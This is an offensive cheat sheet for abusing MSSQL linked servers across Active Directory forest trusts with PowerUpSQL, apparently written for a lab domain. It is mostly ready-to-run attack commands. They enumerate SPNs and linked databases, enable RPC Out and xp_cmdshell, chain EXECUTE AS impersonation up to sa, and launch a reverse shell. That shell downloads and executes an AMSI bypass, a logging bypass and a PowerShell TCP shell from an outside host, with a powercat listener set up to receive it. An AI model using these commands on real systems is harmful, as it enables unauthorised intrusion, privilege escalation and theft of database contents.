mssql

Forest Trusts MSSQL Abuse

Methodology

1. Check the SPN's

2. Check which SPN's you have access to

3. Check the Privileges you have of the above filtered SPN's

4. Keep note of the Instance-Name, ServicePrincipalName and the DomainAccount-Name

5. If you find any service with higher privileges continue below to abuse it

Powershell

[!INFO] Remember to follow the Powershell methodology

PowerUpSQL

For MSSQL and PowerShell hackery, lets use PowerUpSQL

Import-Module .\PowerupSQL-master\PowerupSQL.psd1

. Enumerate SPN

Get-SQLInstanceDomain

2. Check Access

Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

3. Check Privileges / Gather Infromation

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

MSSQL Database Links

Methodology

1. Check the SQL Server link

2. Keep note if you have link to any other database in DatabaseLinkName

3. If SysAdmin:0 means that we will not be allowed to enable xp_cmdshell

4. Keep on enumerating and check all the linked databases you have access to

5. Now we can try to execute commands through out all the linked databases found

Enumerate MSSQL links:

Get-SQLServerLink -Instance us-mssql.us.techcorp.local -Verbose
select * from master..sysservers

Crawl MSSQL links:

Get-SQLServerLinkCrawl -Instance us-mssql -Verbose
select * from openquery("<instanceName>",'select * from openquery("<linkedInstance>",''select * from master..sysservers'')')

Execute command where xp_cmdshell enabled:

Get-SQLServerLinkCrawl -Instance us-mssql -Query 'exec master..xp_cmdshell ''whoami'''

Reverse shell on specific MSSQL instance with disabled logging, AMSI bypass and powercat.ps1: https://github.com/besimorhino/powercat/blob/master/powercat.ps1

# Set up listener
powercat -l -v -p 443 -t 1000

# Reverse shell
Get-SQLServerLinkCrawl -Instance us-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://192.168.1.131/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://192.168.1.131/amsibypass.txt);iex (iwr -UseBasicParsing http://192.168.1.131/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget db-sqlsrv

Enable RPC Out and xp_cmdshell:

Invoke-SqlCmd -Query "exec sp_serveroption @server='db-sqlsrv', @optname='rpc', @optvalue='TRUE'"
Invoke-SqlCmd -Query "exec sp_serveroption @server='db-sqlsrv', @optname='rpc out', @optvalue='TRUE'"
Invoke-SqlCmd -Query "EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT ""db-sqlsrv"""

Extra Commands

Impersonate an user

Invoke-SQLAuditPrivImpersonateLogin -Instance <instanceName> -Exploit -Verbose

#Then, we can EXECUTE AS, and chained the 'EXECUTE AS'
Get-SQLServerLinkCrawl -Verbose -Instance <instanceName> -Query "EXECUTE AS LOGIN = 'dbuser'; EXECUTE AS LOGIN = 'sa'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC master..xp_cmdshell 'powershell -c iex (new-object net.webclient).downloadstring(''http://IP/Invoke-HelloWorld.ps1'')'"

Basic SQL Server queries for DB enumeration

Also works with Get-SQLServerLinkCrawl

#View all db in an instance
Get-SQLQuery -Instance <instanceName> -Query "SELECT name FROM sys.databases"

#View all tables
Get-SQLQuery -Instance <instanceName> -Query "SELECT * FROM dbName.INFORMATION_SCHEMA.TABLES" 

#View all cols in all tables in a db
Get-SQLQuery -Instance <instanceName> -Query "SELECT * FROM dbName.INFORMATION_SCHEMA.columns"

#View data in table
Get-SQLQuery -Instance <instanceName> -Query "USE dbName;SELECT * FROM tableName"